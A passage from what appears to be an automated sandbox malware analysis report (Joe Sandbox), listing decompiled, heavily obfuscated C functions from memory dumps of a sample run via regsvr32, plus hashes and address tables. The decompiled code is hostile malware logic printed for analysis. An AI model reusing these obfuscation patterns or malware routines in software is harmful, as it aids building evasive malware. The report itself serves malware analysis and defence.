                                                                                                                											__eflags = _t183;
                                                                                                                											if(__eflags != 0) {
                                                                                                                												_t192 = 0xebce7c0;
                                                                                                                												continue;
                                                                                                                											}
                                                                                                                										} else {
                                                                                                                											if(_t192 != 0xebce7c0) {
                                                                                                                												goto L19;
                                                                                                                											} else {
                                                                                                                												_t184 = E001B6D3A( &_v60, _t220 + 8, _v116, _v128, _v96);
                                                                                                                												_t224 = _t224 + 0xc;
                                                                                                                												if(_t184 != 0) {
                                                                                                                													_t192 = 0x4876999;
                                                                                                                													continue;
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L22:
                                                                                                                						return _t221;
                                                                                                                					}
                                                                                                                					_t177 = E001B6D3A( &_v60, _t220 + 0x1c, _v120, _v124, _v100);
                                                                                                                					_t224 = _t224 + 0xc;
                                                                                                                					__eflags = _t177;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_t192 = 0xf586255;
                                                                                                                						goto L19;
                                                                                                                					} else {
                                                                                                                						_t192 = 0x7251359;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					goto L22;
                                                                                                                					L19:
                                                                                                                					__eflags = _t192 - 0xf586255;
                                                                                                                				} while (__eflags != 0);
                                                                                                                				goto L22;
                                                                                                                			}

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: -M^6$8oW$ab
                                                                                                                • API String ID: 0-4042031332
                                                                                                                • Opcode ID: a5f24092e32d3a9c857a4c2ab682468fe3bfb63a33d7ffcafa9aec599312b2c7
                                                                                                                • Instruction ID: 018b331227655f408ed6133ddb68672c5c8abe294bb4c1b50ae0399ee16c168a
                                                                                                                • Opcode Fuzzy Hash: a5f24092e32d3a9c857a4c2ab682468fe3bfb63a33d7ffcafa9aec599312b2c7
                                                                                                                • Instruction Fuzzy Hash: 3E9154726083419FC728CE61D98995BBBF1FFD9348F008A1DF28A96160D7B69949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E001A22F7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                				char _v4;
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				unsigned int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				void* _t186;
                                                                                                                				void* _t199;
                                                                                                                				signed int _t209;
                                                                                                                				signed int _t210;
                                                                                                                				signed int _t211;
                                                                                                                				void* _t214;
                                                                                                                				intOrPtr* _t224;
                                                                                                                				void* _t225;
                                                                                                                				signed int* _t228;
                                                                                                                
                                                                                                                				_t224 = _a12;
                                                                                                                				_push(_t224);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t186);
                                                                                                                				_v76 = 0x6b366a;
                                                                                                                				_t228 =  &(( &_v84)[5]);
                                                                                                                				_v76 = _v76 ^ 0xf8a36b54;
                                                                                                                				_t225 = 0;
                                                                                                                				_t214 = 0x6b2b265;
                                                                                                                				_t209 = 0x34;
                                                                                                                				_v76 = _v76 / _t209;
                                                                                                                				_v76 = _v76 | 0xa2838ae8;
                                                                                                                				_v76 = _v76 ^ 0xa6cbcefe;
                                                                                                                				_v64 = 0xfffd08;
                                                                                                                				_v64 = _v64 >> 0x10;
                                                                                                                				_t210 = 0x4b;
                                                                                                                				_v64 = _v64 / _t210;
                                                                                                                				_v64 = _v64 + 0xffff27e0;
                                                                                                                				_v64 = _v64 ^ 0xffff27e2;
                                                                                                                				_v68 = 0x419b1a;
                                                                                                                				_v68 = _v68 ^ 0x0348e9e4;
                                                                                                                				_v68 = _v68 >> 2;
                                                                                                                				_v68 = _v68 >> 0xe;
                                                                                                                				_v68 = _v68 ^ 0x000c10b3;
                                                                                                                				_v72 = 0xff6b59;
                                                                                                                				_v72 = _v72 << 9;
                                                                                                                				_v72 = _v72 + 0xffffc17e;
                                                                                                                				_v72 = _v72 | 0x099bbe29;
                                                                                                                				_v72 = _v72 ^ 0xffd39c09;
                                                                                                                				_v40 = 0xa8a094;
                                                                                                                				_v40 = _v40 ^ 0x7504fee3;
                                                                                                                				_v40 = _v40 + 0xe5f3;
                                                                                                                				_v40 = _v40 ^ 0x75ab03fd;
                                                                                                                				_v44 = 0x504f8c;
                                                                                                                				_v44 = _v44 * 0xb;
                                                                                                                				_v44 = _v44 + 0xffff13d3;
                                                                                                                				_v44 = _v44 ^ 0x03755fa7;
                                                                                                                				_v20 = 0x2acde5;
                                                                                                                				_v20 = _v20 << 0xf;
                                                                                                                				_v20 = _v20 ^ 0x66f293ff;
                                                                                                                				_v48 = 0x2bc8a7;
                                                                                                                				_v48 = _v48 * 0x21;
                                                                                                                				_v48 = _v48 ^ 0xb0a3a5ff;
                                                                                                                				_v48 = _v48 ^ 0xb50b43f1;
                                                                                                                				_v24 = 0x4818c;
                                                                                                                				_v24 = _v24 + 0x60d4;
                                                                                                                				_v24 = _v24 ^ 0x0006e672;
                                                                                                                				_v28 = 0x92aa11;
                                                                                                                				_v28 = _v28 ^ 0x8e9633f1;
                                                                                                                				_v28 = _v28 ^ 0x8e0fb8f6;
                                                                                                                				_v52 = 0x252bf6;
                                                                                                                				_v52 = _v52 + 0xffff72f9;
                                                                                                                				_v52 = _v52 * 0x54;
                                                                                                                				_v52 = _v52 ^ 0x0c02cf27;
                                                                                                                				_v80 = 0xf20005;
                                                                                                                				_v80 = _v80 << 9;
                                                                                                                				_v80 = _v80 << 0xd;
                                                                                                                				_v80 = _v80 >> 5;
                                                                                                                				_v80 = _v80 ^ 0x0003858a;
                                                                                                                				_v84 = 0xaaefd4;
                                                                                                                				_v84 = _v84 >> 0xa;
                                                                                                                				_v84 = _v84 + 0x451d;
                                                                                                                				_v84 = _v84 ^ 0x38fc3a4f;
                                                                                                                				_v84 = _v84 ^ 0x38f9ba66;
                                                                                                                				_v32 = 0x294fa8;
                                                                                                                				_v32 = _v32 | 0x4aa84213;
                                                                                                                				_v32 = _v32 + 0xfffff9bc;
                                                                                                                				_v32 = _v32 ^ 0x4aac717f;
                                                                                                                				_v8 = 0xffc0ee;
                                                                                                                				_v8 = _v8 + 0xffffd934;
                                                                                                                				_v8 = _v8 ^ 0x00ff695a;
                                                                                                                				_v12 = 0xfdb7ff;
                                                                                                                				_v12 = _v12 >> 0xb;
                                                                                                                				_v12 = _v12 ^ 0x000f0236;
                                                                                                                				_v16 = 0x7cf3c2;
                                                                                                                				_t211 = 7;
                                                                                                                				_v16 = _v16 * 0x33;
                                                                                                                				_v16 = _v16 ^ 0x18e6a16f;
                                                                                                                				_v56 = 0x317d8c;
                                                                                                                				_v56 = _v56 / _t211;
                                                                                                                				_v56 = _v56 + 0xffffd5b8;
                                                                                                                				_v56 = _v56 + 0xd560;
                                                                                                                				_v56 = _v56 ^ 0x000544d4;
                                                                                                                				_v60 = 0x93a3ef;
                                                                                                                				_v60 = _v60 ^ 0x41c14663;
                                                                                                                				_v60 = _v60 | 0x255ce750;
                                                                                                                				_v60 = _v60 >> 0xb;
                                                                                                                				_v60 = _v60 ^ 0x000dfc69;
                                                                                                                				_v36 = 0xed38e6;
                                                                                                                				_v36 = _v36 | 0x2530daf4;
                                                                                                                				_v36 = _v36 + 0x9b1d;
                                                                                                                				_v36 = _v36 ^ 0x25ff03de;
                                                                                                                				do {
                                                                                                                					while(_t214 != 0x3b804d2) {
                                                                                                                						if(_t214 == 0x508e570) {
                                                                                                                							_push(_t214);
                                                                                                                							_t225 = E001A303A(_t214, _v4);
                                                                                                                							_t228 =  &(_t228[3]);
                                                                                                                							if(_t225 != 0) {
                                                                                                                								_t214 = 0xbee7f87;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							if(_t214 == 0x6b2b265) {
                                                                                                                								_t214 = 0x3b804d2;
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								if(_t214 != 0xbee7f87) {
                                                                                                                									goto L13;
                                                                                                                								} else {
                                                                                                                									E001B0430(_t214, _t225, _v32, _v8, _v12, _v16,  &_v4, _a4, _t214, _t214, _v56, _v60, _v64, _v36);
                                                                                                                									 *_t224 = _v4;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L6:
                                                                                                                						return _t225;
                                                                                                                					}
                                                                                                                					_t199 = E001B0430(_t214, 0, _v68, _v72, _v40, _v44,  &_v4, _a4, _t214, _t214, _v20, _v48, _v76, _v24);
                                                                                                                					_t228 =  &(_t228[0xc]);
                                                                                                                					if(_t199 == 0) {
                                                                                                                						_t214 = 0x6ca5714;
                                                                                                                						goto L13;
                                                                                                                					} else {
                                                                                                                						_t214 = 0x508e570;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					goto L6;
                                                                                                                					L13:
                                                                                                                				} while (_t214 != 0x6ca5714);
                                                                                                                				goto L6;
                                                                                                                			}


































                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: P\%$j6k$8
                                                                                                                • API String ID: 0-3665046756
                                                                                                                • Opcode ID: 87e90175376fd117733453265d6c76854319db59a287c61951172c501d175640
                                                                                                                • Instruction ID: d347bbc47e3879296f7827c4b0b864b57af9189453a914f61b61ddfa41ffba6f
                                                                                                                • Opcode Fuzzy Hash: 87e90175376fd117733453265d6c76854319db59a287c61951172c501d175640
                                                                                                                • Instruction Fuzzy Hash: FF911EB14083819FC398CF65C98A81FFBF1FB85748F505A1DF69696220D3B68A19DF42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 98%
                                                                                                                			E001BD15E() {
                                                                                                                				signed int _v4;
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				void* _t145;
                                                                                                                				signed int _t146;
                                                                                                                				void* _t153;
                                                                                                                				void* _t175;
                                                                                                                				void* _t180;
                                                                                                                				signed int _t181;
                                                                                                                				signed int _t182;
                                                                                                                				signed int _t183;
                                                                                                                				signed int _t184;
                                                                                                                				intOrPtr _t185;
                                                                                                                				intOrPtr* _t186;
                                                                                                                				signed int _t187;
                                                                                                                				signed int* _t188;
                                                                                                                
                                                                                                                				_t188 =  &_v64;
                                                                                                                				_v52 = 0xa0848e;
                                                                                                                				_v52 = _v52 >> 3;
                                                                                                                				_t153 = 0x6541371;
                                                                                                                				_v52 = _v52 + 0xffffb584;
                                                                                                                				_v52 = _v52 ^ 0x0012c615;
                                                                                                                				_v16 = 0xc722ac;
                                                                                                                				_v16 = _v16 + 0xffff1b68;
                                                                                                                				_v16 = _v16 ^ 0x00c93e2b;
                                                                                                                				_v8 = 0x24c0a1;
                                                                                                                				_v8 = _v8 >> 9;
                                                                                                                				_v8 = _v8 ^ 0x00061860;
                                                                                                                				_v36 = 0xe6d903;
                                                                                                                				_t181 = 0x7c;
                                                                                                                				_v36 = _v36 / _t181;
                                                                                                                				_v36 = _v36 << 0xc;
                                                                                                                				_t180 = 0;
                                                                                                                				_v36 = _v36 ^ 0x1dc12f6e;
                                                                                                                				_v12 = 0xb8ae20;
                                                                                                                				_v12 = _v12 + 0x7b7e;
                                                                                                                				_v12 = _v12 ^ 0x00bd9a64;
                                                                                                                				_v56 = 0x84804;
                                                                                                                				_v56 = _v56 + 0x7031;
                                                                                                                				_v56 = _v56 | 0xe692f604;
                                                                                                                				_v56 = _v56 + 0xffff5b47;
                                                                                                                				_v56 = _v56 ^ 0xe69aca73;
                                                                                                                				_v60 = 0x9ddf11;
                                                                                                                				_v60 = _v60 >> 2;
                                                                                                                				_v60 = _v60 + 0x7ae4;
                                                                                                                				_v60 = _v60 >> 7;
                                                                                                                				_v60 = _v60 ^ 0x0003d98e;
                                                                                                                				_v64 = 0xe1d87e;
                                                                                                                				_v64 = _v64 + 0xffff85be;
                                                                                                                				_t182 = 6;
                                                                                                                				_v64 = _v64 * 0x53;
                                                                                                                				_v64 = _v64 + 0xffffcf2c;
                                                                                                                				_v64 = _v64 ^ 0x4912d591;
                                                                                                                				_v40 = 0x8395;
                                                                                                                				_v40 = _v40 / _t182;
                                                                                                                				_t183 = 0x1c;
                                                                                                                				_v40 = _v40 / _t183;
                                                                                                                				_v40 = _v40 ^ 0x000bd098;
                                                                                                                				_v20 = 0x601bf4;
                                                                                                                				_v20 = _v20 + 0xffff5c57;
                                                                                                                				_v20 = _v20 ^ 0x005874f6;
                                                                                                                				_v44 = 0x32a705;
                                                                                                                				_v44 = _v44 >> 0xd;
                                                                                                                				_v44 = _v44 | 0xfb5bd821;
                                                                                                                				_v44 = _v44 ^ 0xfb51fe60;
                                                                                                                				_v48 = 0xf7548a;
                                                                                                                				_v48 = _v48 + 0xffff745d;
                                                                                                                				_v48 = _v48 + 0xffffbe17;
                                                                                                                				_v48 = _v48 ^ 0x00f473c3;
                                                                                                                				_v24 = 0xb2b47c;
                                                                                                                				_v24 = _v24 >> 0x10;
                                                                                                                				_v24 = _v24 ^ 0x0004f45f;
                                                                                                                				_v4 = 0x5dc847;
                                                                                                                				_v4 = _v4 ^ 0xb2d3419d;
                                                                                                                				_v4 = _v4 ^ 0xb280c8f7;
                                                                                                                				_v28 = 0xeea17b;
                                                                                                                				_v28 = _v28 + 0x2ec6;
                                                                                                                				_v28 = _v28 << 0xc;
                                                                                                                				_v28 = _v28 ^ 0xed0bc3f7;
                                                                                                                				_v32 = 0x568491;
                                                                                                                				_v32 = _v32 | 0x57c08082;
                                                                                                                				_v32 = _v32 << 0xb;
                                                                                                                				_t145 = 0x684e69a;
                                                                                                                				_v32 = _v32 ^ 0xb426afc9;
                                                                                                                				_t184 = _v4;
                                                                                                                				_t187 = _v4;
                                                                                                                				_t152 = _v4;
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					_push(0x5c);
                                                                                                                					L2:
                                                                                                                					while(1) {
                                                                                                                						do {
                                                                                                                							while(_t153 != 0x636b8db) {
                                                                                                                								if(_t153 == 0x6541371) {
                                                                                                                									_t153 = 0xc380f79;
                                                                                                                									continue;
                                                                                                                								} else {
                                                                                                                									if(_t153 == _t145) {
                                                                                                                										E001C267C(_v40, _v20, _t187);
                                                                                                                										_t180 =  !=  ? 1 : _t180;
                                                                                                                										_t153 = 0xaa11ecd;
                                                                                                                										goto L18;
                                                                                                                									} else {
                                                                                                                										if(_t153 == 0xaa11ecd) {
                                                                                                                											E001BED7B(_t187, _v44, _v48, _v24);
                                                                                                                											_t153 = 0xf9ca69f;
                                                                                                                											L18:
                                                                                                                											_t175 = 0x5c;
                                                                                                                											goto L16;
                                                                                                                										} else {
                                                                                                                											if(_t153 == 0xc380f79) {
                                                                                                                												_t185 =  *0x1c4c10; // 0x67d820
                                                                                                                												_t186 = _t185 + 0x20c;
                                                                                                                												while( *_t186 != _t175) {
                                                                                                                													_t186 = _t186 + 2;
                                                                                                                												}
                                                                                                                												_t184 = _t186 + 2;
                                                                                                                												_t153 = 0x636b8db;
                                                                                                                												L16:
                                                                                                                												_t145 = 0x684e69a;
                                                                                                                												continue;
                                                                                                                											} else {
                                                                                                                												if(_t153 == 0xf50c6f0) {
                                                                                                                													_t187 = E001A8E38(_v52, _v56, _v60, _v64, _t184, _t152);
                                                                                                                													_t188 =  &(_t188[4]);
                                                                                                                													_t145 = 0x684e69a;
                                                                                                                													_t153 =  !=  ? 0x684e69a : 0xf9ca69f;
                                                                                                                													goto L1;
                                                                                                                												} else {
                                                                                                                													if(_t153 != 0xf9ca69f) {
                                                                                                                														goto L24;
                                                                                                                													} else {
                                                                                                                														E001BED7B(_t152, _v4, _v28, _v32);
                                                                                                                													}
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                								L10:
                                                                                                                								return _t180;
                                                                                                                							}
                                                                                                                							_push(_t153);
                                                                                                                							_t146 = E001A6E01(_v8, _v36, _t153, _v12, _v16);
                                                                                                                							_t152 = _t146;
                                                                                                                							_t188 =  &(_t188[4]);
                                                                                                                							if(_t146 == 0) {
                                                                                                                								_t153 = 0x9f415a2;
                                                                                                                								_t145 = 0x684e69a;
                                                                                                                								_t175 = 0x5c;
                                                                                                                								goto L24;
                                                                                                                							} else {
                                                                                                                								_t153 = 0xf50c6f0;
                                                                                                                								goto L18;
                                                                                                                							}
                                                                                                                							goto L10;
                                                                                                                							L24:
                                                                                                                						} while (_t153 != 0x9f415a2);
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}
































                                                                                                                0x001bd2e0
                                                                                                                0x001bd2e8
                                                                                                                0x001bd2f0
                                                                                                                0x001bd2f5
                                                                                                                0x001bd2fd
                                                                                                                0x001bd305
                                                                                                                0x001bd30d
                                                                                                                0x001bd315
                                                                                                                0x001bd31d
                                                                                                                0x001bd325
                                                                                                                0x001bd32a
                                                                                                                0x001bd332
                                                                                                                0x001bd33a
                                                                                                                0x001bd342
                                                                                                                0x001bd347
                                                                                                                0x001bd34c
                                                                                                                0x001bd354
                                                                                                                0x001bd358
                                                                                                                0x001bd35c
                                                                                                                0x001bd360
                                                                                                                0x001bd360
                                                                                                                0x001bd360
                                                                                                                0x00000000
                                                                                                                0x001bd363
                                                                                                                0x001bd363
                                                                                                                0x001bd363
                                                                                                                0x001bd375
                                                                                                                0x001bd45f
                                                                                                                0x00000000
                                                                                                                0x001bd37b
                                                                                                                0x001bd37d
                                                                                                                0x001bd44a
                                                                                                                0x001bd455
                                                                                                                0x001bd458
                                                                                                                0x00000000
                                                                                                                0x001bd383
                                                                                                                0x001bd389
                                                                                                                0x001bd430
                                                                                                                0x001bd437
                                                                                                                0x001bd43c
                                                                                                                0x001bd43e
                                                                                                                0x00000000
                                                                                                                0x001bd38f
                                                                                                                0x001bd395
                                                                                                                0x001bd3fa
                                                                                                                0x001bd400
                                                                                                                0x001bd40b
                                                                                                                0x001bd408
                                                                                                                0x001bd408
                                                                                                                0x001bd410
                                                                                                                0x001bd413
                                                                                                                0x001bd418
                                                                                                                0x001bd418
                                                                                                                0x00000000
                                                                                                                0x001bd397
                                                                                                                0x001bd39d
                                                                                                                0x001bd3e1
                                                                                                                0x001bd3e3
                                                                                                                0x001bd3ed
                                                                                                                0x001bd3f2
                                                                                                                0x00000000
                                                                                                                0x001bd39f
                                                                                                                0x001bd3a5
                                                                                                                0x00000000
                                                                                                                0x001bd3ab
                                                                                                                0x001bd3b9
                                                                                                                0x001bd3bf
                                                                                                                0x001bd3a5
                                                                                                                0x001bd39d
                                                                                                                0x001bd395
                                                                                                                0x001bd389
                                                                                                                0x001bd37d
                                                                                                                0x001bd3c0
                                                                                                                0x001bd3c9
                                                                                                                0x001bd3c9
                                                                                                                0x001bd469
                                                                                                                0x001bd47b
                                                                                                                0x001bd480
                                                                                                                0x001bd482
                                                                                                                0x001bd487
                                                                                                                0x001bd492
                                                                                                                0x001bd497
                                                                                                                0x001bd49c
                                                                                                                0x00000000
                                                                                                                0x001bd489
                                                                                                                0x001bd489
                                                                                                                0x00000000
                                                                                                                0x001bd489
                                                                                                                0x00000000
                                                                                                                0x001bd49d
                                                                                                                0x001bd49d
                                                                                                                0x00000000
                                                                                                                0x001bd4a9
                                                                                                                0x001bd363

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: 1p$~{$z
                                                                                                                • API String ID: 3098006287-2708623661
                                                                                                                • Opcode ID: f3b1646ddc478806277d52348ada3ab7511457a59d6b63d20b50241831ff3f49
                                                                                                                • Instruction ID: 7bf6f4ee3d3c3d2cd50269873744816a591b0ea399fdb163bce95e254608126f
                                                                                                                • Opcode Fuzzy Hash: f3b1646ddc478806277d52348ada3ab7511457a59d6b63d20b50241831ff3f49
                                                                                                                • Instruction Fuzzy Hash: 0D81A57160C341EFC3989E25E48946FBBE1FBD4768F50990CF686562A0D7B48949CF83
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
                                                                                                                			E001B7730(void* __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				char _v60;
                                                                                                                				void* _v72;
                                                                                                                				intOrPtr _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				signed int _v96;
                                                                                                                				signed int _v100;
                                                                                                                				signed int _v104;
                                                                                                                				unsigned int _v108;
                                                                                                                				unsigned int _v112;
                                                                                                                				signed int _v116;
                                                                                                                				signed int _v120;
                                                                                                                				signed int _v124;
                                                                                                                				signed int _v128;
                                                                                                                				signed int _v132;
                                                                                                                				void* __ecx;
                                                                                                                				void* _t143;
                                                                                                                				signed int _t167;
                                                                                                                				void* _t171;
                                                                                                                				signed int _t195;
                                                                                                                				signed int _t196;
                                                                                                                				signed int _t197;
                                                                                                                				signed int _t198;
                                                                                                                				signed int* _t200;
                                                                                                                				signed int* _t203;
                                                                                                                
                                                                                                                				_t169 = _a12;
                                                                                                                				_t200 = _a4;
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_t200);
                                                                                                                				E001AC98A(_t143);
                                                                                                                				_v76 = 0xe5e0b1;
                                                                                                                				_t203 =  &(( &_v132)[6]);
                                                                                                                				asm("stosd");
                                                                                                                				_t171 = 0xc2327b9;
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				_v100 = 0x78754;
                                                                                                                				_v100 = _v100 + 0x65f5;
                                                                                                                				_t195 = 0x11;
                                                                                                                				_v100 = _v100 / _t195;
                                                                                                                				_v100 = _v100 ^ 0x0000775e;
                                                                                                                				_v104 = 0xfa64b;
                                                                                                                				_v104 = _v104 ^ 0x05233608;
                                                                                                                				_v104 = _v104 | 0x34374dc2;
                                                                                                                				_v104 = _v104 ^ 0x353bdbae;
                                                                                                                				_v108 = 0x7e03f7;
                                                                                                                				_v108 = _v108 | 0x20e2d8fc;
                                                                                                                				_v108 = _v108 >> 4;
                                                                                                                				_v108 = _v108 ^ 0x0205491c;
                                                                                                                				_v88 = 0xf3147f;
                                                                                                                				_v88 = _v88 + 0xd080;
                                                                                                                				_v88 = _v88 ^ 0x00fc182d;
                                                                                                                				_v112 = 0xf6f5;
                                                                                                                				_v112 = _v112 | 0xffc34e17;
                                                                                                                				_v112 = _v112 >> 0xc;
                                                                                                                				_v112 = _v112 ^ 0x0008fd98;
                                                                                                                				_v116 = 0x23a146;
                                                                                                                				_t196 = 0x30;
                                                                                                                				_v116 = _v116 / _t196;
                                                                                                                				_v116 = _v116 ^ 0x6a671653;
                                                                                                                				_v116 = _v116 ^ 0x6a6eb115;
                                                                                                                				_v120 = 0x83fe4c;
                                                                                                                				_v120 = _v120 | 0xffeb99f5;
                                                                                                                				_v120 = _v120 ^ 0xffe0b241;
                                                                                                                				_v124 = 0x7d772d;
                                                                                                                				_v124 = _v124 << 0xc;
                                                                                                                				_v124 = _v124 << 0xe;
                                                                                                                				_v124 = _v124 ^ 0xb40d4b58;
                                                                                                                				_v92 = 0x7f407e;
                                                                                                                				_v92 = _v92 ^ 0x6429eac1;
                                                                                                                				_v92 = _v92 + 0x9092;
                                                                                                                				_v92 = _v92 ^ 0x6459c238;
                                                                                                                				_v96 = 0xd49d75;
                                                                                                                				_v96 = _v96 + 0xffffe1bf;
                                                                                                                				_v96 = _v96 << 6;
                                                                                                                				_v96 = _v96 ^ 0x3518097b;
                                                                                                                				_v84 = 0xb18f80;
                                                                                                                				_v84 = _v84 ^ 0x1e094a98;
                                                                                                                				_v84 = _v84 ^ 0x1eb6a275;
                                                                                                                				_v132 = 0x2555a9;
                                                                                                                				_t197 = 0x53;
                                                                                                                				_v132 = _v132 / _t197;
                                                                                                                				_v132 = _v132 * 0x47;
                                                                                                                				_v132 = _v132 ^ 0x22c2d3db;
                                                                                                                				_v132 = _v132 ^ 0x22d478f7;
                                                                                                                				_v128 = 0x7a38ed;
                                                                                                                				_v128 = _v128 ^ 0xe3f771e1;
                                                                                                                				_v128 = _v128 ^ 0x4e12562a;
                                                                                                                				_t198 = 0x7a;
                                                                                                                				_v128 = _v128 / _t198;
                                                                                                                				_v128 = _v128 ^ 0x0163ade5;
                                                                                                                				_v80 = 0xa35609;
                                                                                                                				_v80 = _v80 << 2;
                                                                                                                				_v80 = _v80 ^ 0x028d2dcd;
                                                                                                                				do {
                                                                                                                					while(_t171 != 0x2edcc5e) {
                                                                                                                						if(_t171 == 0x63db5b2) {
                                                                                                                							_t200[1] = E001C23B9(_t169);
                                                                                                                							_t171 = 0xf538816;
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							if(_t171 == 0xc2327b9) {
                                                                                                                								_t171 = 0x63db5b2;
                                                                                                                								 *_t200 =  *_t200 & 0x00000000;
                                                                                                                								_t200[1] = _v100;
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								if(_t171 == 0xce4ec78) {
                                                                                                                									E001A4E8F(_t169 + 0xc,  &_v60, __eflags, _v128, _v80);
                                                                                                                								} else {
                                                                                                                									if(_t171 == 0xdc4b8cf) {
                                                                                                                										E001A4E8F(_t169 + 0x14,  &_v60, __eflags, _v84, _v132);
                                                                                                                										_t171 = 0xce4ec78;
                                                                                                                										continue;
                                                                                                                									} else {
                                                                                                                										if(_t171 == 0xf538816) {
                                                                                                                											_push(_t171);
                                                                                                                											_t167 = E001A303A(_t171, _t200[1]);
                                                                                                                											_t203 =  &(_t203[3]);
                                                                                                                											 *_t200 = _t167;
                                                                                                                											__eflags = _t167;
                                                                                                                											if(__eflags != 0) {
                                                                                                                												_t171 = 0xfdfde07;
                                                                                                                												continue;
                                                                                                                											}
                                                                                                                										} else {
                                                                                                                											if(_t171 != 0xfdfde07) {
                                                                                                                												goto L15;
                                                                                                                											} else {
                                                                                                                												E001A6DD9( &_v60, _v116, _v120, _t200, _v124);
                                                                                                                												_t203 =  &(_t203[3]);
                                                                                                                												_t171 = 0x2edcc5e;
                                                                                                                												continue;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L18:
                                                                                                                						__eflags =  *_t200;
                                                                                                                						_t142 =  *_t200 != 0;
                                                                                                                						__eflags = _t142;
                                                                                                                						return 0 | _t142;
                                                                                                                					}
                                                                                                                					E001AE4D8(_v92,  *((intOrPtr*)(_t169 + 0x38)),  &_v60, _v96);
                                                                                                                					_t203 =  &(_t203[2]);
                                                                                                                					_t171 = 0xdc4b8cf;
                                                                                                                					L15:
                                                                                                                					__eflags = _t171 - 0x8aadd9b;
                                                                                                                				} while (__eflags != 0);
                                                                                                                				goto L18;
                                                                                                                			}


                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
